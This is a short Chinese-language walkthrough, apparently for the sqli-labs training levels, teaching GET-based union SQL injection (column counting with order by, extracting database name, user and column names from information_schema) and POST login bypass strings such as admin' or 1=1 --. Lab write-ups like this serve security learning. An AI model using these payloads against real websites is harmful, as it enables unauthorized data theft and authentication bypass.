一、get基于报错的注入

1、利用order by 判断字段数

正确

?id=1'  报错

?id=1' order by 3 --+  (编号为3正确)------可以看出为3个字段

（编号为4错误）

2、union联合注入?id=0(不存在这样的记录，查不到的意思)(报错)

?id=0' union select 1,2,3 --+    (联合查询前面查3个后面查3个)

?id=0' union select 1,database(),user() --+        报： 数据库名  用户名

?id=0%27 union select 1,group_concat(column_name),3 from information_schema.columns where table_name ='user' --+      报：数据库表名

二、post基于报错的注入

在第一关卡得到用户名和密码。

 输入上面的账号密码登入成功

上面是知道密码账号的，如果我们不知道怎么办了

可以先注入一下试一下注入：账号：Dumb\  密码: 123456

万能密码

admin' or 1=1 -- (注意--后面有一个空格) （11关卡）

admin") or 1=1 -- (注意--后面有一个空格) （12关卡）

1、输入账号：Dumb\   密码：123456（发现‘123456“）以”）结尾）

则万能密码是：admin") or 1=1 --